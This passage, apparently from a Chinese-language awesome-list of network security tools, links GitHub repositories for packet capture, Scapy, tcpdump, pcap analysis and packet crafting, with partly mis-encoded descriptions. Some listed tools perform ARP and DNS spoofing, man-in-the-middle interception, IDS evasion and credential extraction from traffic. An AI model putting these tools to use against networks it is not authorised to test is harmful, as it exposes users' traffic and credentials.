Rudimentary network protocol fuzzer using bash, netcat, and other tools. - [**4**ๆ˜Ÿ][12y] [C++] [liamkirton/sslcat](https://github.com/liamkirton/sslcat) [2008] Windows netcat for SSL *** ## <a id="01f99d208e245eb44f15f720043b50d4"></a>Scapy - [**4678**ๆ˜Ÿ][4d] [Py] [secdev/scapy](https://github.com/secdev/scapy) ไบคไบ’ๅผๆ•ฐๆฎๅŒ…ๆ“ไฝœ, Python, ๅ‘ฝไปค่กŒ+ๅบ“ - [**796**ๆ˜Ÿ][8m] [Py] [phaethon/kamene](https://github.com/phaethon/kamene) Network packet and pcap file crafting/sniffing/manipulation/visualization security tool. Originally forked from scapy in 2015 and providing python3 compatibility since then. - ้‡ๅคๅŒบๆฎต: [ๅˆ†ๆž->ๅทฅๅ…ท->ๅ—…ๆŽข](#32739127f0c38d61b14448c66a797098) | - [**309**ๆ˜Ÿ][1y] [Py] [tintinweb/scapy-ssl_tls](https://github.com/tintinweb/scapy-ssl_tls) ็”จไบŽScapy๏ผŒๅœจSSL/TLSๅฑ‚่ฟ›่กŒไบคไบ’ๅผ็š„ๆ•ฐๆฎๅŒ…็ฏกๆ”น - [**274**ๆ˜Ÿ][4m] [Py] [invernizzi/scapy-http](https://github.com/invernizzi/scapy-http) Support for HTTP in Scapy - [**186**ๆ˜Ÿ][5y] [Py] [rpp0/scapy-fakeap](https://github.com/rpp0/scapy-fakeap) Fake wireless Access Point (AP) implementation using Python and Scapy, intended for convenient testing of 802.11 protocols and implementations. - [**64**ๆ˜Ÿ][3y] [Py] [milesrichardson/docker-nfqueue-scapy](https://github.com/milesrichardson/docker-nfqueue-scapy) Dockerๅฎนๅ™จ๏ผŒไฝฟ็”จpython่„šๆœฌๅœจnetfilter้˜Ÿๅˆ—ไธญ็›‘ๅฌๆ•ฐๆฎๅŒ…๏ผŒๅนถไฝฟ็”จscapyๆ“ไฝœๆ•ฐๆฎๅŒ…ใ€‚ - [**47**ๆ˜Ÿ][4y] [Py] [bastilleresearch/scapy-radio](https://github.com/bastilleresearch/scapy-radio) scapy-radio (from original Hg repo) - [**45**ๆ˜Ÿ][4y] [Py] [scy-phy/scapy-cip-enip](https://github.com/scy-phy/scapy-cip-enip) EtherNet/IP+CIP dissector for Scapy - [**41**ๆ˜Ÿ][5y] [Py] [nimai/mptcp-scapy](https://github.com/nimai/mptcp-scapy) MPTCP firewall tester based on scapy - [**33**ๆ˜Ÿ][2y] [Py] [guedou/r2scapy](https://github.com/guedou/r2scapy) a radare2 plugin that decodes packets with Scapy - [**32**ๆ˜Ÿ][3m] [Py] [amossys/fragscapy](https://github.com/amossys/fragscapy) Fragscapy is a command-line tool to fuzz network protocols by automating the modification of outgoing network packets. It can run multiple successive tests to determine which options can be used to evade firewalls and IDS. - [**25**ๆ˜Ÿ][4y] [Py] [averagesecurityguy/scapy](https://github.com/averagesecurityguy/scapy) Scapy Presentation and Code - [**23**ๆ˜Ÿ][7m] [Py] [antisomnus/sniffer](https://github.com/antisomnus/sniffer) Simple sniffer using scapy and PyQt5 on Windows 10 - ้‡ๅคๅŒบๆฎต: [ๅˆ†ๆž->ๅทฅๅ…ท->ๅ—…ๆŽข](#32739127f0c38d61b14448c66a797098) | - [**19**ๆ˜Ÿ][5y] [Py] [feanaur/scapy-pentest](https://github.com/feanaur/scapy-pentest) Scapy Penetration testing scripts - [**14**ๆ˜Ÿ][5y] [Py] [azz2k/scapy-rssi](https://github.com/azz2k/scapy-rssi) Example of how to read RSSI values from wifi packaged using Scapy - [**13**ๆ˜Ÿ][4y] [Py] [rahilsharma/scapy-wireless-scanner](https://github.com/rahilsharma/scapy-wireless-scanner) Final Yr. Project B Tech CSE. Simple wireless scanner built using Scapy Library. - [**12**ๆ˜Ÿ][2y] [Py] [imadhsissou/python-arp-spoofer](https://github.com/imadhsissou/python-arp-spoofer) A friendly command-line spoofing tool written in python using scapy and netifaces. - ้‡ๅคๅŒบๆฎต: [็ฝ‘็ปœๆ”ปๅ‡ป->ๅทฅๅ…ท->ไผช้€ ](#f855508acfc870b1f0d90ff316f1dd75) | - [**10**ๆ˜Ÿ][11m] [Py] [daniel4x/mitm-python](https://github.com/daniel4x/mitm-python) A simple as possible man in the middle written in python using scapy - ้‡ๅคๅŒบๆฎต: [ไธญ้—ดไบบ->ๆœชๅˆ†็ฑป](#42f9e068b6511bcbb47d6b2b273097da) | - [**10**ๆ˜Ÿ][5y] [Py] [emileaben/scapy-dns-ninja](https://github.com/emileaben/scapy-dns-ninja) Minimal DNS answering machine, for customized/programmable answers - [**9**ๆ˜Ÿ][5m] [Py] [skyplabs/scapy-mitm](https://github.com/skyplabs/scapy-mitm) ARP cache poisoning implementation using Scapy - ้‡ๅคๅŒบๆฎต: [ไธญ้—ดไบบ->ๆœชๅˆ†็ฑป](#42f9e068b6511bcbb47d6b2b273097da) | - [**3**ๆ˜Ÿ][4y] [Py] [mk-fg/scapy-nflog-capture](https://github.com/mk-fg/scapy-nflog-capture) Driver for scapy to allow capturing packets via Linux NFLOG interface *** ## <a id="b293f791ec9366957733415323755aa6"></a>Tcpdump - [**1186**ๆ˜Ÿ][19d] [C] [the-tcpdump-group/tcpdump](https://github.com/the-tcpdump-group/tcpdump) the TCPdump network dissector - [**231**ๆ˜Ÿ][1m] [Go] [cloudflare/xdpcap](https://github.com/cloudflare/xdpcap) tcpdump like XDP packet capture - [**59**ๆ˜Ÿ][2y] [Py] [yandex/tcplanz](https://github.com/yandex/tcplanz) TCPDump latency analyzer - [**45**ๆ˜Ÿ][5y] [sergk/cheatsheat-tcpdump](https://github.com/sergk/cheatsheat-tcpdump) cheatsheat-tcpdump - [**34**ๆ˜Ÿ][8y] [C#] [advtools/advsock2pipe](https://github.com/advtools/advsock2pipe) A small utility to connect a TCP socket to a Windows named pipe. It can be used, for exemple, to capture network data with tcpdump on Linux or iPhone/iPad and to see the capture in (almost) realtime in Wireshark on Windows. Released under GPLv3. - [**32**ๆ˜Ÿ][1m] [C++] [f18m/large-pcap-analyzer](https://github.com/f18m/large-pcap-analyzer) A command-line utility program that performs some simple operations on PCAP files (Wireshark/tcpdump traces) very quickly. Allows you to manipulate very large PCAP files that cannot be easily handled with other software like Wireshark (or tshark). Supports filtering encapsulated GTPu frames. Easily extendible. - [**3**ๆ˜Ÿ][4y] [Py] [wouter-glasswall/rogueap](https://github.com/wouter-glasswall/rogueap) Start a rogue access point with no effort, with support for hostapd, airbase, sslstrip, sslsplit, tcpdump builtin - [**2**ๆ˜Ÿ][2y] [wtanaka/ansible-role-tcpdump](https://github.com/wtanaka/ansible-role-tcpdump) Ansible role to install tcpdump *** ## <a id="f13469c9891173804423be4403b2c4ff"></a>pcap ### <a id="d365897ae51adc286d4e6f6787924d69"></a>ๆ”ถ้›† - [**188**ๆ˜Ÿ][3y] [Lua] [automayt/ics-pcap](https://github.com/automayt/ics-pcap) ICS/SCADA PCAPๆ”ถ้›† - [**30**ๆ˜Ÿ][4y] [neu5ron/malware-traffic-analysis-pcaps](https://github.com/neu5ron/malware-traffic-analysis-pcaps) ็ฝ‘็ซ™malware-traffic-analysis.net็š„pcapๆ–‡ไปถๆ‰˜็ฎก ### <a id="eb49514924c3f4bf2acf6f3a4436af13"></a>ๆœชๅˆ†็ฑป - [**765**ๆ˜Ÿ][5m] [Py] [lgandx/pcredz](https://github.com/lgandx/pcredz) This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface. - [**419**ๆ˜Ÿ][11m] [C] [jpr5/ngrep](https://github.com/jpr5/ngrep) ๅบ”็”จไบŽ็ฝ‘็ปœๅฑ‚็š„็ฑปไผผไธŽgrep็š„ๅทฅๅ…ทใ€‚ๅŸบไบŽPCAP๏ผŒๅฏๆŒ‡ๅฎšๆ‰ฉๅฑ•็š„ๆญฃๅˆ™่กจ่พพๅผๆˆ–ๅๅ…ญ่ฟ›ๅˆถ่กจ่พพๅผ๏ผŒๅฏนๆ•ฐๆฎๅŒ…็š„ๆ•ฐๆฎpayload่ฟ›่กŒๅŒน้… - [**380**ๆ˜Ÿ][2m] [Py] [0x4d31/fatt](https://github.com/0x4d31/fatt) FATT /fingerprintAllTheThings - a pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic - [**340**ๆ˜Ÿ][11d] [JS] [dns-oarc/packetq](https://github.com/dns-oarc/packetq) A tool that provides a basic SQL-frontend to PCAP-files - [**225**ๆ˜Ÿ][1m] [Py] [secureworks/dalton](https://github.com/secureworks/dalton) ไฝฟ็”จ้ข„ๅฎšไน‰/ๆŒ‡ๅฎš็š„่ง„ๅˆ™, ้’ˆๅฏนIDSไผ ๆ„Ÿๅ™จ(ไพ‹ๅฆ‚Snort/Suricata)่ฟ›่กŒ็ฝ‘็ปœๆ•ฐๆฎๅŒ…ๆ•่Žท - [**216**ๆ˜Ÿ][2y] [C++] [spacehuhn/arduinopcap](https://github.com/spacehuhn/arduinopcap) ไฝฟ็”จESP8266 / ESP32ๅ’ŒArduin๏ผŒๅˆ›ๅปบๅนถๅ‘้€pcapๆ–‡ไปถ - [**123**ๆ˜Ÿ][2y] [Py] [blazeinfosec/pcrappyfuzzer](https://github.com/blazeinfosec/pcrappyfuzzer) pcrappyfuzzer๏ผšScapy+ radamsa ็š„็ฎ€ๅ•็ป„ๅˆ๏ผŒไปŽ pcap ๆ–‡ไปถไธญๆๅ–ๆ•ฐๆฎ๏ผŒๆ‰ง่กŒๅฟซ้€Ÿ Fuzz - [**123**ๆ˜Ÿ][3m] [XSLT] [pcapng/pcapng](https://github.com/pcapng/pcapng) PCAPไธ‹ไธ€ไปฃๆ–‡ไปถๆ ผๅผ่ง„่Œƒ - [**112**ๆ˜Ÿ][11m] [C] [rup0rt/pcapfix](https://github.com/rup0rt/pcapfix) ไฟฎๅคๆŸๅ็š„pcapๆ–‡ไปถ - [**95**ๆ˜Ÿ][1y] [Py] [hgn/captcp](https://github.com/hgn/captcp) A open source program for TCP analysis of PCAP files - [**88**ๆ˜Ÿ][3y] [Py] [azizaltuntas/network-analysis-tools](https://github.com/azizaltuntas/network-analysis-tools) Pcap (capture file) Analysis Toolkit(v.1) - [**79**ๆ˜Ÿ][1y] [Py] [shendo/websnort](https://github.com/shendo/websnort) Web service for scanning pcaps with snort - [**64**ๆ˜Ÿ][3y] [Ruby] [danielmiessler/caparser](https://github.com/danielmiessler/caparser) A quick and dirty PCAP parser that helps you identify who your applications are sending sensitive data to without encryption. - [**61**ๆ˜Ÿ][6y] [Py] [kevthehermit/yarapcap](https://github.com/kevthehermit/yarapcap) ไฝฟ็”จYARAๅค„็†HTTP Pcap - [**52**ๆ˜Ÿ][6y] [Py] [kevthehermit/maildb](https://github.com/kevthehermit/maildb) Python Web App to Parse and Track Email and http Pcap Files. - [**42**ๆ˜Ÿ][9m] [Go] [dreadl0ck/gopcap](https://github.com/dreadl0ck/gopcap) Go่ฏญ่จ€็ผ–ๅ†™็š„Pcap่ฏปๅ–ๅ™จ๏ผŒๆไพ›ไธŽๅŒ็ฑปๅทฅๅ…ท็š„ๅŸบๅ‡†ๆต‹่ฏ•ๆฏ”่พƒ - [**39**ๆ˜Ÿ][3m] [spiderlabs/iocs-idps](https://github.com/spiderlabs/iocs-idps) This repository will hold PCAP IOC data related with known malware samples (owner: Bryant Smith) - [**37**ๆ˜Ÿ][8m] [Jupyter Notebook] [h21lab/anomaly-detection](https://github.com/h21lab/anomaly-detection) Scripts to help to detect anomalies in pcap file. Anomaly Detection using tensorflow and tshark. - [**37**ๆ˜Ÿ][8y] [JS] [mudynamics/pcapr-local](https://github.com/mudynamics/pcapr-local) ๆต่งˆไธŽ็ฎก็†ๅคง่ง„ๆจก็š„pcapๆ–‡ไปถ - [**36**ๆ˜Ÿ][4m] [Py] [cisco-talos/re2pcap](https://github.com/cisco-talos/re2pcap) ็”จๅŽŸๅง‹HTTP่ฏทๆฑ‚ๆˆ–ๅ“ๅบ”ๅˆ›ๅปบPCAPๆ–‡ไปถ - [**36**ๆ˜Ÿ][11m] [Go] [hdiniz/rtpdump](https://github.com/hdiniz/rtpdump) Extract audio file from RTP streams in pcap format - [**35**ๆ˜Ÿ][2y] [Py] [newbee119/ip-location](https://github.com/NewBee119/IP-location) batch query IP location information๏ผŒๆ‰น้‡ๆŸฅ่ฏขIPๅœฐ็†ไฝ็ฝฎไฟกๆฏ๏ผŒ่งฃๆžpcapๅŒ…ไธญIPๅœฐๅ€็š„ๅœฐ็†ไฟกๆฏ - [**34**ๆ˜Ÿ][11m] [Go] [justinazoff/flow-indexer](https://github.com/justinazoff/flow-indexer) Flow-Indexer indexes flows found in chunked log files from bro,nfdump,syslog, or pcap files - [**32**ๆ˜Ÿ][3m] [C#] [globalpolicy/csarp-netcut](https://github.com/globalpolicy/csarp-netcut) An arpspoof program using Sharppcap - [**28**ๆ˜Ÿ][1y] [C] [lpefferkorn/ipdecap](https://github.com/lpefferkorn/ipdecap) Decapsulate traffic encapsulated within GRE, IPIP, 6in4, ESP (ipsec) protocols, can also remove IEEE 802.1Q (virtual lan) header. Works with pcap files. - [**28**ๆ˜Ÿ][2y] [tatsui-geek/malware-traffic-analysis.net](https://github.com/tatsui-geek/malware-traffic-analysis.net) Download pcap files from - [**27**ๆ˜Ÿ][2y] [Lua] [shengnoah/riff](https://github.com/shengnoah/riff) ไธ€ไธชๅŸบไบŽluaๆ’ไปถ็š„pcap็›‘ๆŽงๅทฅๅ…ทใ€‚ - [**26**ๆ˜Ÿ][2y] [R] [hrbrmstr/crafter](https://github.com/hrbrmstr/crafter) Analyze and Visualize Network Packet Capture (PCAP) Files - [**24**ๆ˜Ÿ][7y] [Ruby] [chrislee35/flowtag](https://github.com/chrislee35/flowtag) FlowTag visualizes pcap files for forensic analysis - [**23**ๆ˜Ÿ][2y] [Py] [fireeye/brocapi](https://github.com/fireeye/brocapi) Bro PCAP Processing and Tagging API - [**22**ๆ˜Ÿ][5y] [Py] [catalyst256/gobbler](https://github.com/catalyst256/gobbler) Gobbling it's way through your pcap files - [**21**ๆ˜Ÿ][6m] [Go] [d4-project/sensor-d4-tls-fingerprinting](https://github.com/d4-project/sensor-d4-tls-fingerprinting) Extract TLS certificates from pcap files or network interfaces, fingerprint TLS client/server interactions with ja3/ja3s - [**21**ๆ˜Ÿ][1y] [C] [the-tcpdump-group/tcpslice](https://github.com/the-tcpdump-group/tcpslice) tcpslice concatenates multiple pcap files together, or extracts time slices from one or more pcap files. - [**20**ๆ˜Ÿ][1y] [Py] [slgobinath/pcap-processor](https://github.com/slgobinath/pcap-processor) ่ฏปๅ–ๅ’Œๅค„็†pcapๆ–‡ไปถ - [**18**ๆ˜Ÿ][1y] [Go] [dirkduesentrieb/fgsniffer](https://github.com/dirkduesentrieb/fgsniffer) Convert Fortigates "diagnose sniffer" output to pcap files - [**17**ๆ˜Ÿ][2y] [C++] [awgn/captop](https://github.com/awgn/captop) Utility to measure the performance of pcap network interfaces. - [**17**ๆ˜Ÿ][1y] [Py] [dr0op/msfrpcapi](https://github.com/dr0op/msfrpcapi) MSF RPC API่ฐƒ็”จๆ–‡ๆกฃๅŠdemo - [**16**ๆ˜Ÿ][1m] [Rust] [courvoif/pcap-file](https://github.com/courvoif/pcap-file) pcap่ฏปๅ–ไธŽๅ†™ๅ…ฅ - [**13**ๆ˜Ÿ][6y] [C] [ashishraste/arp-dns-attacks](https://github.com/ashishraste/arp-dns-attacks) ARP spoofing, HTTP redirection, DNS spoofing and DNS forging using pcap library - [**13**ๆ˜Ÿ][6y] [Py] [catalyst256/pdfhunter](https://github.com/catalyst256/pdfhunter) Looks for pdf files in pcap files and rebuilds them - [**12**ๆ˜Ÿ][2y] [Py] [johnbergbom/peddlecheap](https://github.com/johnbergbom/peddlecheap) Pcaps for PeddleCheap and implant communication + script for interpreting and decrypting pcaps. - [**11**ๆ˜Ÿ][1y] [JS] [hellvinz/goredis](https://github.com/hellvinz/goredis) live monitoring redis commands via pcap in a browser - [**11**ๆ˜Ÿ][5m] [Py] [teto/mptcpanalyzer](https://github.com/teto/mptcpanalyzer) Tool to help analyze mptcp pcaps - [**9**ๆ˜Ÿ][11m] [C] [cedricol07/p2a](https://github.com/cedricol07/p2a) Parse Pcap for Anomalies - [**9**ๆ˜Ÿ][1y] [Py] [yojiwatanabe/networkalarm](https://github.com/yojiwatanabe/networkalarm) A tool to monitor local network traffic for possible security vulnerabilities. Warns user against possible nmap scans, Nikto scans, credentials sent in-the-clear, and shellshock attacks. Currently supports live monitoring and network capture (pcap) scanning. - [**6**ๆ˜Ÿ][1y] [C] [dns-oarc/pcap-thread](https://github.com/dns-oarc/pcap-thread) pcap่พ…ๅŠฉๅบ“๏ผŒๆ”ฏๆŒPOSIX็บฟ็จ‹ๅ’Œ้€ๆ˜Žๅฑ‚ๅ›ž่ฐƒ - [**6**ๆ˜Ÿ][2y] [C] [jduncanator/isniff](https://github.com/jduncanator/isniff) Packet capture and network sniffer for Apple iOS devices (iPhone / iPod). An implementation of iOS 5+ Remote Virtual Interface service and pcapd. - [**3**ๆ˜Ÿ][8m] [C] [sizet/packet_capture](https://github.com/sizet/packet_capture) ไฝฟ็”จ raw socket ๅ’Œๆญ้…่ผ”ๅŠฉ่ณ‡ๆ–™ (ancillary data (PACKET_AUXDATA), ้ฉ็”จๆ–ผ 2.6.21 ไน‹ๅพŒ็š„ๆ ธๅฟƒ) ็›ฃ่ฝๅ’Œ่จ˜้Œ„ (pcap ๆ ผๅผ) ไน™ๅคช็ถฒ่ทฏไป‹้ขไธŠๅ‚ณ้€ๅ’ŒๆŽฅๆ”ถ็š„ๅฐๅŒ…. - [**2**ๆ˜Ÿ][3m] [Py] [lucadivit/pcap_features_extraction](https://github.com/lucadivit/pcap_features_extraction) This program allow you to extract some features from pcap files. - [**1**ๆ˜Ÿ][2y] [C++] [broadsword007/wolfpack](https://github.com/broadsword007/wolfpack) Wolf Pack is a cross-platform network traffic analyzer built using Qt and Library PcapPlusPlus - [**1**ๆ˜Ÿ][2y] [C#] [hidd3ncod3s/pcap2saz](https://github.com/hidd3ncod3s/pcap2saz) Converts HTTP flows in pcap file into SAZ file - [**1**ๆ˜Ÿ][11m] [Py] [techathena/veritas](https://github.com/techathena/veritas) pcap analyser that uses rest api for IP/URL reputation and also for obtaining URL's - [**1**ๆ˜Ÿ][8m] [C++] [z4ziggy/esp8266_pcap_serial](https://github.com/z4ziggy/esp8266_pcap_serial) ESP8266 Sniffer sketch which outputs PCAP data via Serial. - [**1**ๆ˜Ÿ][8m] [C] [z4ziggy/esp8266_pcap_uart](https://github.com/z4ziggy/esp8266_pcap_uart) ESP8266 Sniffer firmware which outputs PCAP data via UART. - [**1**ๆ˜Ÿ][6m] [Py] [tylerp96/pcap-blaster](https://github.com/tylerp96/pcap-blaster) General Purpose PCAP Fuzzer - [**0**ๆ˜Ÿ][1y] [C++] [craiganv/sniffing_stuff](https://github.com/CraigANV/sniffing_stuff) Playing around with pcap, for capturing probe request packets mainly - [**0**ๆ˜Ÿ][1y] [Ruby] [enukane/pcap80211analyzer](https://github.com/enukane/pcap80211analyzer) not-so-smart 802.11 frame pcapng analyzer - [**0**ๆ˜Ÿ][6y] [Py] [hughobrien/wlan-stats](https://github.com/hughobrien/wlan-stats) Tool chain using tshark to pull data from pcaps, further process them in python, and graph the output in R. ### <a id="b239f12aca7aa942b45836032cbef99a"></a>่ฝฌๆข - [**237**ๆ˜Ÿ][2y] [Py] [jullrich/pcap2curl](https://github.com/jullrich/pcap2curl) ๆๅ–็ฝ‘็ปœๆ•ฐๆฎๅŒ…ไธญ็š„HTTP ่ฏทๆฑ‚๏ผŒ่ฝฌๅŒ–ไธบ cURL ๆŒ‡ไปค๏ผŒ็”จไบŽ replay - [**191**ๆ˜Ÿ][6y] [Py] [andrewf/pcap2har](https://github.com/andrewf/pcap2har) ๅฐ†pcapๆ–‡ไปถ่ฝฌไธบHTTPๅฝ’ๆกฃๆ–‡ไปถ - [**45**ๆ˜Ÿ][5y] [securitytube/pcap2xml](https://github.com/securitytube/pcap2xml) ๅฐ†802.11ๆ•ฐๆฎๅŒ…่ทŸ่ธช่ฝฌๆขไธบXMLๅ’ŒSQLITEๆ ผๅผ *** ## <a id="8bc2e181f74ba67ec93fd2a13d95cc0c"></a>libpcap - [**1225**ๆ˜Ÿ][4d] [C] [the-tcpdump-group/libpcap](https://github.com/the-tcpdump-group/libpcap) the LIBpcap interface to various kernel packet capture mechanism - [**783**ๆ˜Ÿ][1y] [JS] [node-pcap/node_pcap](https://github.com/node-pcap/node_pcap) libpcap bindings for node - [**508**ๆ˜Ÿ][4d] [C] [pmacct/pmacct](https://github.com/pmacct/pmacct) pmacct is a small set of multi-purpose passive network monitoring tools [NetFlow IPFIX sFlow libpcap BGP BMP RPKI IGP Streaming Telemetry]. - [**323**ๆ˜Ÿ][6m] [HTML] [helpsystems/pcapy](https://github.com/helpsystems/pcapy) Pcapy is a Python extension module that interfaces with the libpcap packet capture library. - [**213**ๆ˜Ÿ][5m] [Py] [pynetwork/pypcap](https://github.com/pynetwork/pypcap) python libpcap ๆจกๅ— - [**96**ๆ˜Ÿ][9y] [Py] [dugsong/pypcap](https://github.com/dugsong/pypcap) libpcap็š„PythonๅŒ…่ฃ… - [**67**ๆ˜Ÿ][4y] [C] [luigirizzo/netmap-libpcap](https://github.com/luigirizzo/netmap-libpcap) Automatically exported from code.google.com/p/netmap-libpcap - [**48**ๆ˜Ÿ][5y] [Py] [allfro/pcappy](https://github.com/allfro/pcappy) A pure Python libpcap wrapper! - [**42**ๆ˜Ÿ][6y] [Ruby] [sophsec/ffi-pcap](https://github.com/sophsec/ffi-pcap) Ruby FFI bindings for libpcap. - [**19**ๆ˜Ÿ][6d] [Crystal] [maiha/pcap.cr](https://github.com/maiha/pcap.cr) Crystal bindings for libpcap - [**13**ๆ˜Ÿ][10m] [C] [c-bata/xpcap](https://github.com/c-bata/xpcap) Cross-platform Packet Capture which supports Linux and macOS(BSD) in 1000 LOC without depending on libpcap. - [**8**ๆ˜Ÿ][1y] [C] [weaknetlabs/libpcap-80211-c](https://github.com/weaknetlabs/libpcap-80211-c) 802.11 Libpcap and C - [**4**ๆ˜Ÿ][11y] [tadashi/wifi-monitor](https://github.com/tadashi/wifi-monitor) python, py_libpcap, handover - [**3**ๆ˜Ÿ][9d] [Rust] [jmmk/rustcap](https://github.com/jmmk/rustcap) Rust wrapper for libpcap - [**2**ๆ˜Ÿ][3y] [Py] [killswitch-gui/nix-sniffer-examples](https://github.com/killswitch-gui/nix-sniffer-examples) Python ctypes libpcap examples - [**0**ๆ˜Ÿ][3y] [C] [h3pr5tq/get-rssi](https://github.com/h3pr5tq/get-rssi) Linux utility for getting RSSI WiFi of APs to text file. Using Monitor mode, libpcap. Useful for experiments with WiFi (example, localization). *** ## <a id="5303e6ae470e6def3b69d614674a1c46"></a>WinPcap - [**236**ๆ˜Ÿ][4y] [C] [softethervpn/win10pcap](https://github.com/softethervpn/win10pcap) Windows 10 WinPcap (NDIS 6.x ้ฉฑๅŠจๆจกๅผ) - [**113**ๆ˜Ÿ][4y] [C] [wireshark/winpcap](https://github.com/wireshark/winpcap) WinPcapๆ•ฐๆฎๅŒ…ๆ•่Žทๅบ“ - [**51**ๆ˜Ÿ][2y] [Py] [orweis/winpcapy](https://github.com/orweis/winpcapy) A Modern Python wrapper for WinPcap - [**33**ๆ˜Ÿ][2y] [Batchfile] [3gstudent/winpcap_install](https://github.com/3gstudent/winpcap_install) Auto install WinPcap on Windows(command line) - [**10**ๆ˜Ÿ][6m] [C] [sageaxcess/pcap-ndis6](https://github.com/sageaxcess/pcap-ndis6) WinPCAP for NDIS 6.x *** ## <a id="31d28e8b2cf6c06411cd5d178dbd3e77"></a>fiddler - [**448**ๆ˜Ÿ][3d] [C#] [malwareinfosec/ekfiddle](https://github.com/malwareinfosec/ekfiddle) Fiddler Web่ฐƒ่ฏ•ๅ™จ็š„ๆก†ๆžถ๏ผŒ็”จไบŽ็ ”็ฉถๆผๆดžๅˆฉ็”จๅทฅๅ…ทๅŒ…ใ€ๆถๆ„ๅนฟๅ‘Šๅ’Œๆถๆ„ๆต้‡ - ้‡ๅคๅŒบๆฎต: [ๅˆ†ๆž->ๅทฅๅ…ท->ๆœชๅˆ†็ฑป](#b346105580b0240d693020ce8719ebca) | - [**297**ๆ˜Ÿ][1y] [JS] [xxxily/fiddler-plus](https://github.com/xxxily/fiddler-plus) ่‡ชๅฎšไน‰็š„Fiddler่ง„ๅˆ™๏ผŒๅคš็Žฏๅขƒๅˆ‡ๆขใ€่งฃๅ†ณ่ทจๅŸŸๅผ€ๅ‘ใ€ๅฟซ้€Ÿ่ฐƒ่ฏ•็บฟไธŠไปฃ็ ๅฟ…ๅค‡|้ซ˜ๆ•ˆ่ฐƒ่ฏ•ๅˆ†ๆžๅˆฉๅ™จ - [**81**ๆ˜Ÿ][4y] [C#] [david-risney/csp-fiddler-extension](https://github.com/david-risney/csp-fiddler-extension) Content Security Policy rule collector extension for Fiddler - [**76**ๆ˜Ÿ][2y] [C#] [vahidn/process-proxifier](https://github.com/vahidn/process-proxifier) Using FiddlerCore to add proxy settings to the Windows applications - [**46**ๆ˜Ÿ][8m] [JS] [radenvodka/pentol](https://github.com/radenvodka/pentol) PENTOL - Pentester Toolkit for Fiddler2 - [**24**ๆ˜Ÿ][6y] [Py] [emergingthreats/fiddler2pcap](https://github.com/emergingthreats/fiddler2pcap) fiddlerๆ’ไปถ๏ผŒ่พ“ๅ‡บๅˆฐpcap - [**14**ๆ˜Ÿ][8m] [C#] [jprknight/exofiddlerextension](https://github.com/jprknight/exofiddlerextension) The Exchange Online Fiddler Extension - [**2**ๆ˜Ÿ][1y] [Go] [progtramder/webproxy](https://github.com/progtramder/webproxy) A fiddler-like webproxy, support sniffing http/https content by implementing 'Sniffer' interface - ้‡ๅคๅŒบๆฎต: [ๅˆ†ๆž->ๅทฅๅ…ท->ๅ—…ๆŽข](#32739127f0c38d61b14448c66a797098) | *** ## <a id="64f068672e615343db9235f1973d8fba"></a>็ฝ‘็ปœๆ•ฐๆฎๅŒ… - [**6630**ๆ˜Ÿ][5d] [Py] [networkx/networkx](https://github.com/networkx/networkx) ็”จไบŽๅˆ›ๅปบใ€ๆ“็บตๅ’Œ็ ”็ฉถๅคๆ‚็ฝ‘็ปœ็š„็ป“ๆž„๏ผŒPythonๅŒ… - [**517**ๆ˜Ÿ][2m] [C] [libnet/libnet](https://github.com/libnet/libnet) ๅˆ›ๅปบๅ’Œๆณจๅ…ฅ็ฝ‘็ปœๆ•ฐๆฎๅŒ… - [**360**ๆ˜Ÿ][3y] [C] [rafael-santiago/pig](https://github.com/rafael-santiago/pig) Linuxๆ•ฐๆฎๅŒ…ๅˆ›ๅปบๅทฅๅ…ท - [**289**ๆ˜Ÿ][6d] [C] [troglobit/nemesis](https://github.com/troglobit/nemesis) ็ฝ‘็ปœๆ•ฐๆฎๅŒ…ๆž„้€ ๅ’Œๆณจๅ…ฅ็š„ๅ‘ฝไปค่กŒๅทฅๅ…ท - [**127**ๆ˜Ÿ][1m] [C] [cisco-talos/file2pcap](https://github.com/cisco-talos/file2pcap) ๅˆ›ๅปบๅ„็ง็ฑปๅž‹็š„ๆ•ฐๆฎๅŒ…ๆ•่Žทๆ–‡ไปถ๏ผŒๅ…ถไธญๅŒ…ๅซๆŒ‡ๅฎš็š„ไปปไฝ•ๆ–‡ไปถ็š„ๅ†…ๅฎน *** ## <a id="eec238a1a2657b70f7bbbe68a4421249"></a>ๅ…ถไป– - [**15856**ๆ˜Ÿ][] [C] [curl/curl](https://github.com/curl/curl) ๅ‘ฝไปค่กŒๅทฅๅ…ทๅ’Œๅบ“๏ผŒไฝฟ็”จURL่ฏญๆณ•ไผ ่พ“ๆ•ฐๆฎ๏ผŒๆ”ฏๆŒHTTP๏ผŒHTTPS๏ผŒFTP๏ผŒFTPS๏ผŒGOPHER๏ผŒTFTP๏ผŒSCP๏ผŒSFTP๏ผŒSMB๏ผŒTELNET๏ผŒDICT๏ผŒLDAP๏ผŒLDAPS๏ผŒFILE๏ผŒIMAP๏ผŒSMTP๏ผŒPOP3๏ผŒRTSPๅ’ŒRTMPใ€‚libcurlๆไพ›ไบ†่ฎธๅคšๅผบๅคง็š„ๅŠŸ่ƒฝ - [**4152**ๆ˜Ÿ][1y] [JS] [kdzwinel/betwixt](https://github.com/kdzwinel/betwixt) ๅœจๆต่งˆๅ™จๅค–๏ผŒไฝฟ็”จ็†Ÿๆ‚‰็š„Chrome DevTools็•Œ้ขๅˆ†ๆž็ฝ‘็ปœๆต้‡ - [**2363**ๆ˜Ÿ][2m] [Lua] [snabbco/snabb](https://github.com/snabbco/snabb) ็ฝ‘็ปœๅทฅๅ…ทๅŒ…๏ผŒ็ฎ€ๅ•ใ€ๅฟซ้€Ÿ - [**1211**ๆ˜Ÿ][2y] [C] [saminiir/level-ip](https://github.com/saminiir/level-ip) Linux็”จๆˆทๆจกๅผ TCP/IP ๆ ˆ๏ผŒไฝฟ็”จ TUN/TAP ่ฎพๅค‡๏ผˆๆ“ไฝœ็ณป็ปŸๅ†…ๆ ธไธญ็š„่™šๆ‹Ÿ็ฝ‘็ปœ่ฎพๅค‡๏ผ‰ๅฎž็Žฐ - [**821**ๆ˜Ÿ][11d] [C] [emmericp/ixy](https://github.com/emmericp/ixy) 